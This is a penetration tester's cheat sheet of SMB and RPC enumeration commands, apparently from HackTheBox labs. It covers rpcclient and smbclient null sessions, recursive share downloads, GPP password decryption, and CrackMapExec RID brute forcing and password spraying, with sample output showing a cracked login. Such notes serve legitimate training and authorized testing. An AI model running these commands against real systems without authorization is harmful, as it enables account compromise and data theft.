SMB & RPC Enumeration

enum4linux

enum4linux IP

rpcclient

rpcclient -U '' 10.129.229.11

rpcclient> enumdomusers

hit tab twice

rpcclient> querydispinfo

smbclient

Null session

smbclient //10.129.230.0/support-tools -N

smbclient -L //IP -U '' -P ''

Connect to a share

Connect and download recursively all resources

smbclient //IP/IPC$  

smbclient //10.129.229.121/Replication

smb: \> recurse on
smb: \> prompt off
smb: \> mget *

SMB Null session

smbclient -L //IP -U '' -P ''

smbmap

smbmap -d active.htb -u SVC_TGS -p GPPstillStandingStrong2k18 -H 10.129.229.121 

Group Polict Preferences (GPP)

gpp-decrypt edBSHOwhZLTjt/QS9FeIcJ83mjWA98gw9guKOhJOdcqh+ZGMeXOsQbCpZ3xUjTLfCuNH8pG5aSVYdYw/NglVmQ  

CrackMapExec smb

Determine Password Policy

crackmapexec smb 10.129.228.111 --pass-pol

└─# crackmapexec smb 10.129.96.157 -u ./users.txt -p ./passwords.txt 
SMB         10.129.96.157   445    SUPPORTDESK      [*] Windows 10.0 Build 17763 x64 (name:SUPPORTDESK) (domain:SupportDesk) (signing:False) (SMBv1:False)
SMB         10.129.96.157   445    SUPPORTDESK      [-] SupportDesk\admin:stealth1agent STATUS_LOGON_FAILURE 
SMB         10.129.96.157   445    SUPPORTDESK      [+] SupportDesk\Hazard:stealth1agent 

SID bruteforcing

https://www.crackmapexec.wiki/smb-protocol/enumeration/enumerate-users-by-bruteforcing-ridwww.crackmapexec.wiki

crackmapexec smb 10.129.96.157 -u hazard -p stealth1agent --rid-brute

Password bruteforce

Users / Users

Try out first username combinations as a password

crackmapexec smb 10.129.228.111 -u ./users.txt -p ./users.txt  --continue-on-success

Users / Username (1)

try username as the password (only one attempt per user)

crackmapexec smb 10.10.85.7 -u ./users.uniq -p ./users.uniq --continue-on-success --no-bruteforce 

Users with empty password

try users with empty passwords

└─# crackmapexec smb 10.10.85.7 -u ./users.uniq -p '' --continue-on-success --no-bruteforce